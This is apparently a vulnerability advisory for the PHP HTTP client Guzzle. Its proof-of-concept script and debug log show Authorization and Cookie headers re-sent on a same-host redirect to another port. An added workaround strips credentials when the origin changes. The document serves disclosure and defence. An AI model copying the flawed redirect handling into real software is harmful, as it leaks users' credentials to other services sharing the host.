Sensitive header uncleared on same-host, cross-port redirect in guzzle/guzzle
Jun 10th 2022
Sensitive headers (Authorization and Cookie) are not cleared when a redirect points to the same host on a different port.
Proof of Concept
```php
<?php
require 'vendor/autoload.php';

use GuzzleHttp\Client;

// Client pointed at the test host; redirects are followed automatically (default).
$client = new Client([
    'base_uri' => 'http://10.0.2.4',
]);

// /redirect.php answers 302 with Location: http://10.0.2.4:81 (same host, other port).
// 'debug' => TRUE prints the raw requests so the re-sent headers can be seen.
$response = $client->get('/redirect.php', [
    'debug' => TRUE,
    'headers' => [
        'Content-Type'  => 'application/x-www-form-urlencoded',
        'Cookie'        => 'a=b',
        'Authorization' => 'secret',
    ],
]);

$body = $response->getBody();
```
Note in the debug output that the Cookie and Authorization headers sent to port 80 are re-sent unchanged on the follow-up request to port 81.
```
*   Trying 10.0.2.4:80...
* TCP_NODELAY set
* Connected to 10.0.2.4 (10.0.2.4) port 80 (#0)
> GET /redirect.php HTTP/1.1
Host: 10.0.2.4
User-Agent: GuzzleHttp/7
Content-Type: application/x-www-form-urlencoded
Cookie: a=b
Authorization: secret

* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Fri, 10 Jun 2022 14:58:01 GMT
< Server: Apache/2.4.53 (Debian)
< Location: http://10.0.2.4:81
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host 10.0.2.4 left intact
*   Trying 10.0.2.4:81...
* TCP_NODELAY set
* Connected to 10.0.2.4 (10.0.2.4) port 81 (#1)
> GET / HTTP/1.1
Host: 10.0.2.4:81
User-Agent: GuzzleHttp/7
Content-Type: application/x-www-form-urlencoded
Cookie: a=b
Authorization: secret
```
Different ports on the same host are often controlled by different parties (separate applications or tenants sharing one IP address), so re-sending sensitive headers to a different port leaks them to a third party. A change of port should therefore be treated like a change of host: a change of origin. For reference, curl versions >= 7.83.0 also clear sensitive headers on cross-port redirects.
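As an added example (not part of the original report and not Guzzle's own code), the following is a client-side workaround for applications that cannot upgrade: automatic redirects are disabled and followed by hand, and Authorization and Cookie are dropped whenever the redirect target differs from the current request in scheme, host or port. The host, path and header values mirror the PoC above; `effectivePort()`, `sameOrigin()` and `followRedirects()` are hypothetical helper names.

```php
<?php
// Added example: manual redirect handling that treats a change in scheme,
// host OR port as a change of origin and strips sensitive headers.
// Not Guzzle's own code; helper names are hypothetical.
require 'vendor/autoload.php';

use GuzzleHttp\Client;
use GuzzleHttp\Psr7\Request;
use GuzzleHttp\Psr7\Uri;
use GuzzleHttp\Psr7\UriResolver;
use GuzzleHttp\Psr7\Utils;
use Psr\Http\Message\RequestInterface;
use Psr\Http\Message\ResponseInterface;
use Psr\Http\Message\UriInterface;

const SENSITIVE_HEADERS = ['Authorization', 'Cookie'];

// Effective port: the explicit port, or the scheme default when none is given,
// so http://host and http://host:80 compare as the same origin.
function effectivePort(UriInterface $uri): int
{
    if ($uri->getPort() !== null) {
        return $uri->getPort();
    }
    return strtolower($uri->getScheme()) === 'https' ? 443 : 80;
}

// Two URIs share an origin only if scheme, host and effective port all match.
function sameOrigin(UriInterface $a, UriInterface $b): bool
{
    return strtolower($a->getScheme()) === strtolower($b->getScheme())
        && strtolower($a->getHost()) === strtolower($b->getHost())
        && effectivePort($a) === effectivePort($b);
}

// Follows 3xx responses by hand. The client must be created with
// 'allow_redirects' => false so every hop passes through the origin check.
function followRedirects(Client $client, RequestInterface $request, int $maxHops = 5): ResponseInterface
{
    for ($hop = 0; ; $hop++) {
        $response = $client->send($request, ['debug' => true]);
        $status = $response->getStatusCode();
        if ($status < 300 || $status >= 400 || !$response->hasHeader('Location')) {
            return $response;
        }
        if ($hop >= $maxHops) {
            throw new RuntimeException('Too many redirects');
        }

        // Location may be relative; resolve it against the current request URI.
        $target = UriResolver::resolve(
            $request->getUri(),
            new Uri($response->getHeaderLine('Location'))
        );

        // Cross-origin hop (including 10.0.2.4:80 -> 10.0.2.4:81): drop credentials.
        if (!sameOrigin($request->getUri(), $target)) {
            foreach (SENSITIVE_HEADERS as $name) {
                $request = $request->withoutHeader($name);
            }
        }

        // withUri() also rewrites the Host header for the new target.
        $request = $request->withUri($target);

        // 303, and 301/302 after a POST, are re-sent as GET without a body.
        if ($status === 303 || (in_array($status, [301, 302], true) && $request->getMethod() === 'POST')) {
            $request = $request->withMethod('GET')
                ->withBody(Utils::streamFor(''))
                ->withoutHeader('Content-Type');
        }
    }
}

// Usage mirroring the PoC: same host, redirect from port 80 to port 81.
$client = new Client(['allow_redirects' => false, 'http_errors' => false]);
$request = new Request('GET', 'http://10.0.2.4/redirect.php', [
    'Content-Type'  => 'application/x-www-form-urlencoded',
    'Cookie'        => 'a=b',
    'Authorization' => 'secret',
]);
$response = followRedirects($client, $request);
echo $response->getStatusCode(), PHP_EOL;
```

With this loop, the debug output for the second request to port 81 no longer carries Cookie or Authorization, while a redirect to another path on http://10.0.2.4 (same scheme, host and port) keeps them. Comparing effective ports rather than raw `getPort()` values matters because PSR-7 returns null for a default port, and a naive `!==` comparison would treat `http://host` and `http://host:80` as different origins.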